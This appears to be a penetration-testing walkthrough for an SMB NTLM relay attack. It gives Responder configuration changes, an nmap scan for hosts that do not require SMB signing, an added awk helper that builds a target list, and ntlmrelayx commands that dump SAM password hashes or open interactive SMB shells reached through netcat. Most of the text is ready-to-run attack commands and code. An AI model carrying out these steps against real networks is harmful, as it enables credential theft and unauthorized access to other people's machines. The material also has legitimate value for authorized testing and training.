Instead of cracking the NTLMv2 hashes captured with Responder, we can relay the authentication itself over SMB to specific machines and potentially gain access. The relay only works against hosts that do not require SMB signing, and the relayed user's privileges apply on the target: with local administrator rights we get a SAM dump, otherwise at most the shares that user can read.

Requirements

#Edit the Responder config file and turn off the SMB and HTTP servers, otherwise Responder captures the auth itself and ntlmrelayx cannot bind ports 445/80 to relay it
sudo nano /etc/responder/Responder.conf

After saving, confirm the [Responder Core] section reads SMB = Off and HTTP = Off before starting Responder.


#Identify the hosts where SMB signing is not required (the script reports "Message signing enabled but not required" for those; domain controllers usually show "enabled and required" and cannot be relayed to)
nmap --script=smb2-security-mode.nse -p 445 -Pn 10.10.10.0/24


Save the IP addresses of the hosts where SMB signing is not required to targets.txt (one per line), then start Responder on the interface facing the victims.
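Building targets.txt by hand is error-prone on a /24, so here is a small helper that pulls the relayable hosts out of the nmap normal output (-oN). This is an added example, not part of the original notes; the scan text below is constructed with assumed addresses to show the format the script parses, and the relay_targets function name is my own.

```shell
#!/bin/sh
# Added example: extract relay targets (SMB signing not required) from
# `nmap --script=smb2-security-mode -p 445 -oN scan.txt` output.

# Constructed sample of nmap normal output (assumed hosts, not a real scan):
# 10.10.10.1 requires signing, 10.10.10.5 does not, 10.10.10.9 has 445 closed.
SAMPLE_SCAN='Nmap scan report for 10.10.10.1
Host is up (0.00021s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.5
Host is up (0.00032s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.9
Host is up (0.00040s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds
'

# relay_targets: read nmap normal output on stdin, print one IP per line for
# every host whose smb2-security-mode result contains "not required".
# Hosts with 445 closed produce no script result and are skipped automatically.
relay_targets() {
    awk '
        # Remember the current host. nmap prints either "for 10.10.10.5" or
        # "for name (10.10.10.5)", so take the last field and strip parentheses.
        /^Nmap scan report for/ {
            host = $NF
            sub(/^\(/, "", host)
            sub(/\)$/, "", host)
        }
        # Signing "enabled but not required" or "disabled and not required"
        # both mean the host accepts unsigned sessions, i.e. it is relayable.
        /Message signing/ && /not required/ { print host }
    ' | sort -u
}

# Real usage (assumed filenames):
#   nmap --script=smb2-security-mode.nse -p 445 -Pn -oN scan.txt 10.10.10.0/24
#   relay_targets < scan.txt > targets.txt
printf '%s' "$SAMPLE_SCAN" | relay_targets
```

Feed the resulting targets.txt to ntlmrelayx; anything the scan marked as "enabled and required" is deliberately left out, because the relay would fail against it.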

#Setup your relay (by default ntlmrelayx relays to each host in targets.txt and, if the relayed user is a local admin there, dumps the SAM)
sudo ntlmrelayx.py -tf targets.txt -smb2support

Trigger an event: for example, a user on the network opening a non-existent share or mistyping a hostname, so that Responder's LLMNR/NBT-NS poisoning sends their authentication to our relay.


Once the event occurred, ntlmrelayx relayed the authentication to the targets and dumped their SAM hashes. If the relayed account is not a local administrator on a target, no SAM dump is produced for that host.


#Interactive mode: instead of dumping the SAM, open an SMB client shell on a local TCP port for each relayed session (the port is printed in the output)
sudo ntlmrelayx.py -tf targets.txt -smb2support -i


Use netcat to connect to the interactive SMB shell that ntlmrelayx opened on localhost (port 11000 in this case; use whatever port its output reports)

nc 127.0.0.1 11000

Now we can browse the target's shares, files and folders from this shell (for example, shares to list them, use C$ to open one, then ls and get).
